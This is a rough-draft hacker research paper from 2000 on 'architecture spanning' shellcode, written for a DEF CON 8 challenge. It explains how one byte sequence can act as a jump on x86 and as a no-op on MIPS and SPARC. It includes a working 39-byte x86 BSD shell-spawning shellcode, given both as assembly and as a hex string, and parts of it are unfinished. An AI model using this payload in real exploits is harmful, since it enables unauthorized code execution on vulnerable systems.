Architecture spanning shellcode

Architecture spanning shellcode
	by eugene@subterrain.net	09/05/2000

[rough draft. send all the comments to eugene@subterrain.net]

Content:
	Introduction
	Intel architecture
	Mips architecture
	Sparc architecture
	Putting it all together
	Credits
	References
	To Do list



Introduction:

  At defcon8 caezar's challenge 4 party a problem was present to write a
shellcode that will run on two or more processor platforms. Below you will
find my solution (don't forget to check the credits section).

  The general idea behind a architecture spanning shellcode is trying
to come up with a sequence of bytes that would execute a jump instruction on
one architecture while executing a NOP-like instruction on another architecture.
That way we can branch to our shellcode on one architecture and falling through
to a different shellcode on another architecture.

  Here is an ascii presentation of our bit stream:

XXX
arch1 shellcode
arch2 shellcode

where XXX is a sequence of bytes that is going to branch to arch2's
shellcode on arch2 and going to fall through to arch1's shellcode on arch1.

In our case arch1 is going to be a MIPS platform and arch2 is an Intel platform

Due to certain intricacies (explained later) our bit stream is going to look
like
[XXX: this is probably going to go away]

XXX
YYY
arch2 shellcode
arch1 shellcode

where XXX is the intel jump / mips nop instruction and YYY is a MIPS short jump
instruction that will jump to MIPS shellcode.

[XXX: do more research on this.. can be avoided if we peform a longer jump
thus still allowing for MIPS opcode to be 0]
[XXX: do more research on short intel jumps.. how big is the short intel
jmp instruction? the jmp i am using right now is 5 bytes long which is
obviously a long jump]
[XXX: branch delay slots! need to have a working code in order to test those
 can get complicated.. give some theory behind CPU optimizations]





Intel architecture:

$ uname -ms
OpenBSD i386			// openbsd.. the only way to fly

$ cat jmp.asm			// a simple example of a relative jump
				// instruction. using this example + gdb
				// we can figure out the hex and binary
				// equiv of our instruction
section .text
global  _syscall:
        int     0x80
	ret

_start:
        mov     eax, 2
        jmp     $+0xA		; relative jump! jump to a push instruction
				; thus bypassing mov eax, 3 instruction
        mov     eax, 3
        push    eax
        mov     eax, 1          ; sys_exit
        call    _syscall

$ nasm -f aoutb jmp.asm		// this is how we compile & link our nasm code
$ ld -e _start -o jmp jmp.o
$ ./jmp
$ echo $?
2				// notice that the return code is 2 and not 3!
				// that means that our jmp $+0xA worked.
				// the jmp instruction jumped over 'mov eax, 3'
				// instruction
$ gdb -q jmp
(no debugging symbols found)...(gdb) disassemble start
Dump of assembler code for function start:
0x1023 : movl   $0x2,%eax
0x1028 :       jmp    0x1032 
0x102d :      movl   $0x3,%eax
0x1032 :      pushl  %eax
0x1033 :      movl   $0x1,%eax
0x1038 :      call   0x1020 
0x103d :      nop
0x103e :      nop
0x103f :      nop
End of assembler dump.
(gdb) x/5bx start+5			// our jump instruction
					// 0xe9 is the opcode.
					// the last four bytes is the
					// offset - 5 bytes
0x1028 :       0xe9    0x05    0x00    0x00    0x00
(gdb) x/t start+5
0x1028 :       11101001	// binary for 0xe9. will need that later


39 bytes intel shellcode by yours truly (with some feedback from bind). To
learn more about writing shellcode check out Aleph's One article on writing
buffer overflows in Phrack 49 (see the reference part).


__asm__("
        jmp     0x21                    # 27 bytes
        popl    %esi

        pushl   $0

        movl    %esi, 8(%esi)           # ptr to ptr to /bin/sh
        leal    8(%esi), %eax
        pushl   %eax

        movl    %esi, %eax              # ptr to /bin/sh
        pushl   %eax

        movl    $0x3b, %eax
        pushl   $0
        int     $0x80

        pushl   $5
        pushl   $0
        movl    $1, %eax
        int     $0x80

        call    -0x26                   # 32 bytes
#       .string \"/bin/sh\"
        .byte   0x2f
        .byte   0x62
        .byte   0x69
        .byte   0x6e
        .byte   0x2f
        .byte   0x73
        .byte   0x68
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
        .byte   0x00
");





MIPS architecture:

The nice thing about MIPS assemly is that each MIPS instruction is exactly
32 bits long.

In our case, first intel instruction (jmp) is 5 bytes long thus we pad the 5
byte intel instruction with another 3 bytes to create a total of 2 MIPS
instructions.

first intel instruction (jmp $+12) looks like
0xe9    0x07    0x00    0x00	0x00

converting it to binary gives us

11101001 00000111 00000000 00000000 00000000

we are going to ignore the last byte for now as it is going to become
the first byte of the next MIPS instruction.
also we shouldn't forget that MIPS architecture is big-endian while Intel
arch is little-endian thus we should swap the consequitive bytes around

In order to make sense out of the above binary stream we have to understand
how MIPS processor is going to interpret it. [XXX: add more comments
regarding MIPS instruction formats]

MIPS R-type instruction format:

opcode (5 bits)  rs (5 bits)  rt (5 bits)  rd (5 bits)  shamt (5 bits) funct
									(6 bits)

00000 11100 10100 10000 00000 00000
(op)  (rs)  (rt)  (rd)  (shamt) (funct)

The opcode of 0 represents a variety of arithmetic instructions. We need to
look at the funct field in order to figure out which instruction is going to
be executed. A MIPS reference indicates that an opcode of 0 and funct of 0
represent a shift left instruction (sll). Even though this is not a nop
instruction it is good enough in our case since shift amount (shamt) is 0
none of the registers are going to be changed.

next MIPS instruction looks like:
   
0x00	0x00    0x00    0x00

32 bits of 0's is a MIPS nop instruction (MIPS nop instruction is "represented
by sll $0, $0, 0, which shifts the register 0 left 0 places. it does nothing
to register 0, which can't be changed in any case, and hence is used as a nop
by MIPS software")



the shellcode itself is incomplete..  need an account on a MIPS box
(i.e. an SGI box)
if you can provide me with an account for a short amount of time that would
be great!





Sparc architecture:

Just as it is the case with MIPS architecture, Sparc instructions are also
always 32 bits long. Sparc architecture is also big-endian thus whatever
instruction decoding we applied to MIPS is also applicable to sparc..
thus our 2 sparc instructions are going to like

0xe9    0x07    0x00    0x00	0x00
11101001 00000111 00000000 00000000 00000000

and

00000000000000....

an opcode of 0 in sparc belongs to SETHI & Branches (Bicc, FBfcc, CBcc) group
[XXX: decode the rest of the instruction. make sure it does what we want (nop)]
[XXX: the challenge at this point is have a MIPS jump to be a nop in Sparc
assembly.. or the other way around.. thus our bits stream now looks like

XXX		- intel jump
YYY		- mips jump
ZZZ		- sparc jump.. might not need that in case we make sparc
		  shellcode to follow the YYY jump
arch1
arch2
arch3

fun ;-)
]





Putting it all together.. Architecture spanning shellcode:


0xe9    0x07    0x00    0x00    0x00	; jmp $+12 (intel)
0x00	0x00	0x00			; some useless MIPS arithmetic inst.

(MIPS 4 byte jump to MIPS shellcode)

intel shellcode:

\xeb\x21\x5e\x6a\x00\x89\x76\x08\x8d\x46\x08\x50\x89\xf0
\x50\xb8\x3b\x00\x00\x00\x6a\x00\xcd\x80\x6a\x05\x6a\x00\xb8\x01
\x00\x00\x00\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e
\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00

(MIPS shellcode)






Credits:

Greg Hoglund for coming up with the original idea at the challenge party
prole & harm for coming with an idea way before Greg :)
SSG, ghettohackers





References:


prole & harm's paper on the subject (way more extensive than mine)
	not released yet.

the challenge
	www.caezarschallenge.org

aleph's one article on buffer overlows in phrack 49.





To Do List:

add more architectures (at least sparc, maybe hp and powerpc)

[XXX: afaik the core powerpc instruction set is the same as that of MIPS]

[XXX: do more research on shellcode that will run on both bsd & linux..
	bsd passes the parameters to syscalls on stack while linux uses
	registers for that..

$ cat linuxbsdasm.asm
section .text
global  _start

_syscall:
        int     0x80
        ret

_start:
        mov     ebx, 13		; place the exit code in a register (for linux)
        push    ebx		; and push it on stack (for bsd)
        mov     eax, 1          ; sys_exit (common call for both OSes)
        call    _syscall        ; exit(13)

$ nasm -f aoutb linuxbsdasm.asm && ld -e _start -o linuxbsdasm linuxbsdasm.o
$ ./linuxbsdasm
$ echo $?
13
$ uname -ms
OpenBSD i386
$ ssh -l eugene linuxbox
[eugene@linuxbox]$ nasm -f elf linuxbsdasm.asm && ld -s -o linuxbsdasm linuxbsdasm.o
[eugene@linuxbox]$ ./linuxbsdasm
[eugene@linuxbox]$ echo $?
13
[eugene@linuxbox]$ uname -ms
Linux i686
]